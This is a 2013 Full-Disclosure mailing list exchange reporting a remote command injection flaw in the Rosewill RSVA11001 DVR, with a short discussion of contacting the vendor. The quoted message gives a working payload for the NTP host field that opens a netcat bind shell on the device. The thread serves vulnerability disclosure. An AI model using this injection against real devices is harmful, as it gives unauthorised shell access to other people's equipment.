Re: Fwd: Remote command injection vulnerability in Rosewill RSVA11001 (Hi3515 based)

[Eric Urban <hydrogen18 () gmail com>]

Rose will just responds to me with engrish when I email them. I have no
point of contact for hi silicon. I would gladly assist the manufacturer in
addressing this hole if put into contact with the right people.
On Mar 25, 2013 8:56 AM, "Henri Salo" <henri () nerv fi> wrote:

> On Sun, Mar 24, 2013 at 05:43:43PM -0400, Eric Urban wrote:
> > I have been hacking on a Rosewill RSVA11001 for a while now, something to
> > suck up my free time. I had pulled apart the firmware previously but did
> > not succeed in finding a way to get a shell on the device. The box is
> > Hi3515 based, I found an exploit for another similar box (Ray Sharp) but
> it
> > did not work. The Rosewill firmware seems to use an executable that
> listens
> > on two ports rather one when communicating with the Windows-based control
> > software. Port 8000 is now the command port rather 9000, 9000 is used for
> > video only. After playing with the included Windows application I
> > eventually did a strings on the 'hi_dvr' exectuable that is the user
> space
> > program that controls the interface to thing. I found this gem:
> >
> > /mnt/ntpdate -q %s > /tmp/tmpfs/ntptmp
> >
> > So I used the windows software to set the NTP host to
> >
> > a;/usr/bin/nc -l -p 5555 -e /bin/sh&
>
> Did you report this to the vendor?
>
> --
> Henri Salo
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.10 (GNU/Linux)
>
> iEYEARECAAYFAlFQSZIACgkQXf6hBi6kbk/jpACePQuP3jtEBZe+YzVZ2y0zXSNW
> YPcAoLQAmb9yBU14PRpI8RKCeE+XjRfG
> =bybp
> -----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/